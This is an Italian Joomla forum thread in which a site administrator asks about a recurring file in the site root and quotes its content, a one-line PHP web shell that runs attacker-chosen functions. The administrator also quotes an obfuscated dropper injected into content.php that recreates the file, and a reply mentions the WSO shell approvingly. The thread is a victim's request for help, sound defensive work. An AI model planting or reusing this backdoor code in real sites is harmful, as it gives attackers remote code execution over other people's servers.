Joomla.it Forum

Non solo Joomla... => Sicurezza => : giusebos 11 May 2016, 15:09:06

: strano file nella root del sito
: giusebos 11 May 2016, 15:09:06

nel root di uno dei siti che gestisco ho trovato un file:
com_contact_info.php

con al suo interno

:

<?php ($_=@$_GET[c]).@$_($_POST["5f3avg"])?>
per adesso l'ho cancellato un paio di volte, poi però dopo qualche giorno il file si ripresenta

facendo una ricerca non riesco a trovare nessuna informazione. Avete qualche idea di cosa possa fare quella stringa?

: Re:strano file nella root del sito
: MariaElenaBoschi 11 May 2016, 16:13:05

può fare qualunque cosa, dipende da che valore dai alle due variabili che recuperi una dal get e una dal post.

se lo cancelli e si rigenera qualcosa non va, hai qualche script che fai partire quando accedi

: Re:strano file nella root del sito
: giusebos 11 May 2016, 16:20:47

proprio adesso mi sono accorto che va a recuperare in components/com_content/content.php questa stringa che è stata aggiunta all'inizio

:

$content = '<?php (';$content .= '$_=';$content .= '@$_G';$content .= 'ET[c]).@$_($_P';$content .= 'OS';$content .= 'T["5f3avg"])?>';$file = @fopen("/var/www/vhosts/vpsxxxxxx.ovh.net/pippo.it/components/com_contact/views/category/com_contact_info.php", "w");@fwrite($file,  $content) ;

: Re:strano file nella root del sito
: MariaElenaBoschi 12 May 2016, 14:01:23

fai una ricerca nei files della stringa "wso"... solitamente è la shell che usano per joomla.
Molto carina e utile per un sacco di lavori, protetta da keyword così la si può usare con buona sicurezza anche su siti di clienti.
Aveva fatto un articolo esplicativo Pasotti aka elpaso

: Re:strano file nella root del sito
: giusebos 12 May 2016, 17:05:53

non ho trovato nessuna occorrenza wso fra le stringhe dei files, dai log viene fuori che è falito l'accesso a
components/com_content/content.php.
ip apparentemente di provenienza Ceca